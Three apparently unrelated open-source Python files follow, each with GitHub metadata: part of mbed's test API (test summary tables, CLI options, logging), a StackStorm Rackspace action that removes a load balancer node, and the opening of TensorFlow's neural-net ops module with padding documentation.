if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
sufix = 's' if len(toolchain_conflicts[target]) > 1 else ''
result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, sufix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
# FIlter out platforms using regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if type(test[col]) == ListType:
col_value = join_delim.join(test[col])
elif test[col] == None:
col_value = "-"
row.append(col_value)
if test['automated'] == True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
step = int(percent_progress / 2) # Scale by to (scale: 1 - 50)
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation / 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print single_test.generate_test_summary(test_summary, shuffle_seed)
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
class TestLogger():
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
or just handled all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def factory_db_logger(db_url):
""" Factory database driver depending on database type supplied in database connection string db_url
"""
if db_url is not None:
from workspace_tools.test_mysql import MySQLDBAccess
connection_info = BaseDBAccess().parse_db_connection_string(db_url)
if connection_info is not None:
(db_type, username, password, host, db_name) = BaseDBAccess().parse_db_connection_string(db_url)
if db_type == 'mysql':
return MySQLDBAccess()
return None
def detect_database_verbose(db_url):
""" uses verbose mode (prints) database detection sequence to check it database connection string is valid
"""
result = BaseDBAccess().parse_db_connection_string(db_url)
if result is not None:
# Parsing passed
(db_type, username, password, host, db_name) = result
#print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
# Let's try to connect
db_ = factory_db_logger(db_url)
if db_ is not None:
print "Connecting to database '%s'..."% db_url,
db_.connect(host, username, password, db_name)
if db_.is_connected():
print "ok"
print "Detecting database..."
print db_.detect_database(verbose=True)
print "Disconnecting...",
db_.disconnect()
print "done"
else:
print "Database type '%s' unknown"% db_type
else:
print "Parse error: '%s' - DB Url error"% (db_url)
def get_module_avail(module_name):
""" This function returns True if module_name is already impored module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS(mbeds_list):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
m = {'mcu' : mut['platform_name'],
'port' : mut['serial_port'],
'disk' : mut['mount_point'],
'peripherals' : [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
def get_autodetected_TEST_SPEC(mbeds_list, use_default_toolchain=True, use_supported_toolchains=False, toolchain_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['platform_name']
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter.split(','):
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = optparse.OptionParser()
parser.add_option('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
help='Points to file with test specification')
parser.add_option('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_option("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type="int",
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_option('', '--auto',
dest='auto_detect',
metavar=False,
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
parser.add_option('', '--tc',
dest='toolchains_filter',
help="Toolchain filter for --auto option. Use toolcahins names separated by comma, 'default' or 'all' to select toolchains")
parser.add_option('', '--clean',
dest='clean',
metavar=False,
action="store_true",
help='Clean the build directory')
parser.add_option('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_option('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
help='Test only board internals. Skip perpherials tests and perform common tests.')
parser.add_option('-n', '--test-by-names',
dest='test_by_names',
help='Runs only test enumerated it this switch')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_option('-c', '--copy-method',
dest='copy_method',
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_option('-r', '--reset-type',
dest='mut_reset_type',
default=None,
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_option('-g', '--goanna-for-tests',
dest='goanna_for_tests',
metavar=False,
action="store_true",
help='Run Goanna static analyse tool for tests. (Project will be rebuilded)')
parser.add_option('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
metavar=False,
action="store_true",
help='Run Goanna static analyse tool for mbed SDK (Project will be rebuilded)')
parser.add_option('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
help='Suppresses display of wellformatted table with test results')
parser.add_option('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
help='Displays wellformatted table with test x toolchain test result per target')
parser.add_option('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_option('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_option("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_option("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_option('', '--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
help='Displays full test specification and MUTs configration and exits')
parser.add_option('', '--loops',
dest='test_loops_list',
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_option('', '--global-loops',
dest='test_global_loops_value',
help='Set global number of test loops per test. Default value is set 1')
parser.add_option('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops options. Tests until OK result occurs and assumes test passed.')
parser.add_option('-N', '--firmware-name',
dest='firmware_global_name',
help='Set global name for all produced projects. Note, proper file extension will be added by buid scripts.')
parser.add_option('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_option('', '--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_option('-f', '--filter',
dest='general_filter_regex',
default=None,
help='For some commands you can use filter to filter out results')
parser.add_option('', '--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type="int",
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_option('', '--db',
dest='db_url',
help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
parser.add_option('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_option('', '--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_option('', '--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_option('', '--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_option('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_option('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_option('', '--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
return parser
| {
"content_hash": "25bac0fd1c1fd0d94e2657bb5f4a1506",
"timestamp": "",
"source": "github",
"line_count": 1652,
"max_line_length": 210,
"avg_line_length": 45.06113801452784,
"alnum_prop": 0.5490657030399914,
"repo_name": "sam-geek/mbed",
"id": "d52485286e1e301b309a9839fde0748bed26465f",
"size": "74441",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "workspace_tools/test_api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "2677478"
},
{
"name": "C",
"bytes": "63927578"
},
{
"name": "C++",
"bytes": "5393205"
},
{
"name": "HTML",
"bytes": "439831"
},
{
"name": "Makefile",
"bytes": "181"
},
{
"name": "Objective-C",
"bytes": "424583"
},
{
"name": "Python",
"bytes": "510319"
},
{
"name": "Shell",
"bytes": "188"
}
],
"symlink_target": ""
} |
from lib.action import PyraxBaseAction
__all__ = [
'DeleteNodeFromLoadBalancerAction'
]
class DeleteNodeFromLoadBalancer(PyraxBaseAction):
def run(self, loadbalancer_id, ip):
clb = self.pyrax.cloud_loadbalancers
self.logger.info('Deleting node from loadbalancer...')
load_balancer = clb.get(loadbalancer_id)
target_ip = [node for node in load_balancer.nodes if node.address == ip][0]
target_ip.delete()
# Block until added
self.pyrax.utils.wait_until(load_balancer, "status", "ACTIVE",
interval=1, attempts=30, verbose=True)
self.logger.info('Successfully removed node from loadbalancer: %s' % target_ip)
return target_ip
| {
"content_hash": "a50baeb864e020538964dcb2bb51c569",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 87,
"avg_line_length": 29.88,
"alnum_prop": 0.643908969210174,
"repo_name": "jtopjian/st2contrib",
"id": "e67efd75090361a60016725969d84601eb201ecb",
"size": "747",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packs/rackspace/actions/delete_node_from_loadbalancer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "851"
},
{
"name": "Python",
"bytes": "162337"
},
{
"name": "Shell",
"bytes": "1425"
}
],
"symlink_target": ""
} |
"""Primitive Neural Net (NN) Operations.
## Notes on padding
Several neural network operations, such as `tf.nn.conv2d` and
`tf.nn.max_pool2d`, take a `padding` parameter, which controls how the input is
padded before running the operation. The input is padded by inserting values
(typically zeros) before and after the tensor in each spatial dimension. The
`padding` parameter can either be the string `'VALID'`, which means use no
padding, or `'SAME'` which adds padding according to a formula which is
described below. Certain ops also allow the amount of padding per dimension to
be explicitly specified by passing a list to `padding`.
In the case of convolutions, the input is padded with zeros. In case of pools,
the padded input values are ignored. For example, in a max pool, the sliding
window ignores padded values, which is equivalent to the padded values being
`-infinity`.
### `'VALID'` padding
Passing `padding='VALID'` to an op causes no padding to be used. This causes the
output size to typically be smaller than the input size, even when the stride is
one. In the 2D case, the output size is computed as:
```
out_height = ceil((in_height - filter_height + 1) / stride_height)
out_width = ceil((in_width - filter_width + 1) / stride_width)
```
The 1D and 3D cases are similar. Note `filter_height` and `filter_width` refer
to the filter size after dilations (if any) for convolutions, and refer to the
window size for pools.
### `'SAME'` padding
With `'SAME'` padding, padding is applied to each spatial dimension. When the
strides are 1, the input is padded such that the output size is the same as the
input size. In the 2D case, the output size is computed as:
```
out_height = ceil(in_height / stride_height)
out_width = ceil(in_width / stride_width)
```
The amount of padding used is the smallest amount that results in the output
size. The formula for the total amount of padding per dimension is:
```
if (in_height % strides[1] == 0):
pad_along_height = max(filter_height - stride_height, 0)
else:
pad_along_height = max(filter_height - (in_height % stride_height), 0)
if (in_width % strides[2] == 0):
pad_along_width = max(filter_width - stride_width, 0)
else:
pad_along_width = max(filter_width - (in_width % stride_width), 0)
```
Finally, the padding on the top, bottom, left and right are:
```
pad_top = pad_along_height // 2
pad_bottom = pad_along_height - pad_top
pad_left = pad_along_width // 2
pad_right = pad_along_width - pad_left
```
Note that the division by 2 means that there might be cases when the padding on
both sides (top vs bottom, right vs left) are off by one. In this case, the
bottom and right sides always get the one additional padded pixel. For example,
when pad_along_height is 5, we pad 2 pixels at the top and 3 pixels at the
bottom. Note that this is different from existing libraries such as PyTorch and
Caffe, which explicitly specify the number of padded pixels and always pad the
same number of pixels on both sides.
Here is an example of `'SAME'` padding:
>>> in_height = 5
>>> filter_height = 3
>>> stride_height = 2
>>>
>>> in_width = 2
>>> filter_width = 2
>>> stride_width = 1
>>>
>>> inp = tf.ones((2, in_height, in_width, 2))
>>> filter = tf.ones((filter_height, filter_width, 2, 2))
>>> strides = [stride_height, stride_width]
>>> output = tf.nn.conv2d(inp, filter, strides, padding='SAME')
>>> output.shape[1] # output_height: ceil(5 / 2)
3
>>> output.shape[2] # output_width: ceil(2 / 1)
2
### Explicit padding
Certain ops, like `tf.nn.conv2d`, also allow a list of explicit padding amounts
to be passed to the `padding` parameter. This list is in the same format as what
is passed to `tf.pad`, except the padding must be a nested list, not a tensor.
For example, in the 2D case, the list is in the format `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]` when `data_format` is its default
value of `'NHWC'`. The two `[0, 0]` pairs indicate the batch and channel
dimensions have no padding, which is required, as only spatial dimensions can
have padding.
For example:
>>> inp = tf.ones((1, 3, 3, 1))
>>> filter = tf.ones((2, 2, 1, 1))
>>> strides = [1, 1]
>>> padding = [[0, 0], [1, 2], [0, 1], [0, 0]]
>>> output = tf.nn.conv2d(inp, filter, strides, padding=padding)
>>> tuple(output.shape)
(1, 5, 3, 1)
>>> # Equivalently, tf.pad can be used, since convolutions pad with zeros.
>>> inp = tf.pad(inp, padding)
>>> # 'VALID' means to use no padding in conv2d (we already padded inp)
>>> output2 = tf.nn.conv2d(inp, filter, strides, padding='VALID')
>>> tf.debugging.assert_equal(output, output2)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numbers
import os
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables as variables_lib
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_nn_ops import *
# pylint: enable=wildcard-import
from tensorflow.python.platform import device_context
from tensorflow.python.util import deprecation
from tensorflow.python.util import dispatch
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.deprecation import deprecated_args
from tensorflow.python.util.deprecation import deprecated_argument_lookup
from tensorflow.python.util.tf_export import tf_export
# Aliases for some automatically-generated names.
local_response_normalization = gen_nn_ops.lrn
# pylint: disable=protected-access
# Acceptable channels last formats (robust to H, W, D order).
_CHANNELS_LAST_FORMATS = frozenset({
"NWC", "NHC", "NHWC", "NWHC", "NDHWC", "NDWHC", "NHDWC", "NHWDC", "NWDHC",
"NWHDC"
})
def _get_sequence(value, n, channel_index, name):
"""Formats a value input for gen_nn_ops."""
# Performance is fast-pathed for common cases:
# `None`, `list`, `tuple` and `int`.
if value is None:
return [1] * (n + 2)
# Always convert `value` to a `list`.
if isinstance(value, list):
pass
elif isinstance(value, tuple):
value = list(value)
elif isinstance(value, int):
value = [value]
elif not isinstance(value, collections_abc.Sized):
value = [value]
else:
value = list(value) # Try casting to a list.
len_value = len(value)
# Fully specified, including batch and channel dims.
if len_value == n + 2:
return value
# Apply value to spatial dims only.
if len_value == 1:
value = value * n # Broadcast to spatial dimensions.
elif len_value != n:
raise ValueError("{} should be of length 1, {} or {} but was {}".format(
name, n, n + 2, len_value))
# Add batch and channel dims (always 1).
if channel_index == 1:
return [1, 1] + value
else:
return [1] + value + [1]
def _non_atrous_convolution(
input, # pylint: disable=redefined-builtin
filter, # pylint: disable=redefined-builtin
padding,
data_format=None, # pylint: disable=redefined-builtin
strides=None,
name=None):
"""Computes sums of N-D convolutions (actually cross correlation).
It is required that 1 <= N <= 3.
This is used to implement the more generic `convolution` function, which
extends the interface of this function with a `dilation_rate` parameter.
Args:
input: Rank N+2 tensor of type T of shape
`[batch_size] + input_spatial_shape + [in_channels]` if `data_format`
does not start with `"NC"`, or
`[batch_size, in_channels] + input_spatial_shape` if `data_format` starts
with `"NC"`.
filter: Rank N+2 tensor of type T of shape
`filter_spatial_shape + [in_channels, out_channels]`. Rank of either
`input` or `filter` must be known.
padding: Padding method to use, must be either "VALID" or "SAME".
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
strides: Sequence of N positive integers, defaults to `[1] * N`.
name: Name prefix to use.
Returns:
Rank N+2 tensor of type T of shape
`[batch_size] + output_spatial_shape + [out_channels]`, where
if padding == "SAME":
output_spatial_shape = input_spatial_shape
if padding == "VALID":
output_spatial_shape = input_spatial_shape - filter_spatial_shape + 1.
Raises:
ValueError: if ranks are incompatible.
"""
with ops.name_scope(name, "non_atrous_convolution", [input, filter]) as scope:
input = ops.convert_to_tensor(input, name="input") # pylint: disable=redefined-builtin
input_shape = input.shape
filter = ops.convert_to_tensor(filter, name="filter") # pylint: disable=redefined-builtin
filter_shape = filter.shape
op = _NonAtrousConvolution(
input_shape,
filter_shape=filter_shape,
padding=padding,
data_format=data_format,
strides=strides,
name=scope)
return op(input, filter)
class _NonAtrousConvolution(object):
"""Helper class for _non_atrous_convolution.
Note that this class assumes that shapes of input and filter passed to
`__call__` are compatible with `input_shape` and filter_shape passed to the
constructor.
Args:
input_shape: static input shape, i.e. input.shape.
filter_shape: static filter shape, i.e. filter.shape.
padding: see _non_atrous_convolution.
data_format: see _non_atrous_convolution.
strides: see _non_atrous_convolution.
name: see _non_atrous_convolution.
num_batch_dims: (Optional.) The number of batch dimensions in the input;
if not provided, the default of `1` is used.
"""
def __init__(
self,
input_shape,
filter_shape,
padding,
data_format=None,
strides=None,
name=None,
num_batch_dims=1):
# filter shape is always rank num_spatial_dims + 2
# and num_spatial_dims == input_shape.ndims - num_batch_dims - 1
if input_shape.ndims is not None:
filter_shape = filter_shape.with_rank(
input_shape.ndims - num_batch_dims + 1)
self.padding = padding
self.name = name
# input shape is == num_spatial_dims + num_batch_dims + 1
# and filter_shape is always rank num_spatial_dims + 2
if filter_shape.ndims is not None:
input_shape = input_shape.with_rank(
filter_shape.ndims + num_batch_dims - 1)
if input_shape.ndims is None:
raise ValueError(
"Rank of convolution must be known, but saw input_shape.ndims == {}"
.format(input_shape.ndims))
if input_shape.ndims < 3 or input_shape.ndims - num_batch_dims + 1 > 5:
raise ValueError(
"`input_shape.ndims - num_batch_dims + 1` must be at least 3 and at "
"most 5 but saw `input_shape.ndims == {}` and `num_batch_dims == {}`"
.format(input_shape.ndims, num_batch_dims))
conv_dims = input_shape.ndims - num_batch_dims - 1
if strides is None:
strides = [1] * conv_dims
elif len(strides) != conv_dims:
raise ValueError("len(strides)=%d, but should be %d" % (len(strides),
conv_dims))
if conv_dims == 1:
# conv1d uses the 2-d data format names
if data_format is None:
data_format = "NWC"
elif data_format not in {"NCW", "NWC", "NCHW", "NHWC"}:
raise ValueError("data_format must be \"NWC\" or \"NCW\".")
self.strides = strides[0]
self.data_format = data_format
self.conv_op = self._conv1d
elif conv_dims == 2:
if data_format is None or data_format == "NHWC":
data_format = "NHWC"
strides = [1] + list(strides) + [1]
elif data_format == "NCHW":
strides = [1, 1] + list(strides)
else:
raise ValueError("data_format must be \"NHWC\" or \"NCHW\".")
self.strides = strides
self.data_format = data_format
self.conv_op = conv2d
elif conv_dims == 3:
if data_format is None or data_format == "NDHWC":
strides = [1] + list(strides) + [1]
elif data_format == "NCDHW":
strides = [1, 1] + list(strides)
else:
raise ValueError("data_format must be \"NDHWC\" or \"NCDHW\". Have: %s"
% data_format)
self.strides = strides
self.data_format = data_format
self.conv_op = _conv3d_expanded_batch
# Note that we need this adapter since argument names for conv1d don't match
# those for gen_nn_ops.conv2d and gen_nn_ops.conv3d.
# pylint: disable=redefined-builtin
def _conv1d(self, input, filter, strides, padding, data_format, name):
return conv1d(
value=input,
filters=filter,
stride=strides,
padding=padding,
data_format=data_format,
name=name)
# pylint: enable=redefined-builtin
def __call__(self, inp, filter): # pylint: disable=redefined-builtin
return self.conv_op(
input=inp,
filter=filter,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
name=self.name)
def squeeze_batch_dims(inp, op, inner_rank, name=None):
"""Returns `unsqueeze_batch(op(squeeze_batch(inp)))`.
Where `squeeze_batch` reshapes `inp` to shape
`[prod(inp.shape[:-inner_rank])] + inp.shape[-inner_rank:]`
and `unsqueeze_batch` does the reverse reshape but on the output.
Args:
inp: A tensor with dims `batch_shape + inner_shape` where `inner_shape`
is length `inner_rank`.
op: A callable that takes a single input tensor and returns a single.
output tensor.
inner_rank: A python integer.
name: A string.
Returns:
`unsqueeze_batch_op(squeeze_batch(inp))`.
"""
with ops.name_scope(name, "squeeze_batch_dims", [inp]):
inp = ops.convert_to_tensor(inp, name="input")
shape = inp.shape
inner_shape = shape[-inner_rank:]
if not inner_shape.is_fully_defined():
inner_shape = array_ops.shape(inp)[-inner_rank:]
batch_shape = shape[:-inner_rank]
if not batch_shape.is_fully_defined():
batch_shape = array_ops.shape(inp)[:-inner_rank]
if isinstance(inner_shape, tensor_shape.TensorShape):
inp_reshaped = array_ops.reshape(inp, [-1] + inner_shape.as_list())
else:
inp_reshaped = array_ops.reshape(
inp, array_ops.concat(([-1], inner_shape), axis=-1))
out_reshaped = op(inp_reshaped)
out_inner_shape = out_reshaped.shape[-inner_rank:]
if not out_inner_shape.is_fully_defined():
out_inner_shape = array_ops.shape(out_reshaped)[-inner_rank:]
out = array_ops.reshape(
out_reshaped, array_ops.concat((batch_shape, out_inner_shape), axis=-1))
out.set_shape(inp.shape[:-inner_rank] + out.shape[-inner_rank:])
return out
@tf_export("nn.dilation2d", v1=[])
@dispatch.add_dispatch_support
def dilation2d_v2(
input, # pylint: disable=redefined-builtin
filters, # pylint: disable=redefined-builtin
strides,
padding,
data_format,
dilations,
name=None):
"""Computes the grayscale dilation of 4-D `input` and 3-D `filters` tensors.
The `input` tensor has shape `[batch, in_height, in_width, depth]` and the
`filters` tensor has shape `[filter_height, filter_width, depth]`, i.e., each
input channel is processed independently of the others with its own
structuring function. The `output` tensor has shape
`[batch, out_height, out_width, depth]`. The spatial dimensions of the output
tensor depend on the `padding` algorithm. We currently only support the
default "NHWC" `data_format`.
In detail, the grayscale morphological 2-D dilation is the max-sum correlation
(for consistency with `conv2d`, we use unmirrored filters):
output[b, y, x, c] =
max_{dy, dx} input[b,
strides[1] * y + rates[1] * dy,
strides[2] * x + rates[2] * dx,
c] +
filters[dy, dx, c]
Max-pooling is a special case when the filter has size equal to the pooling
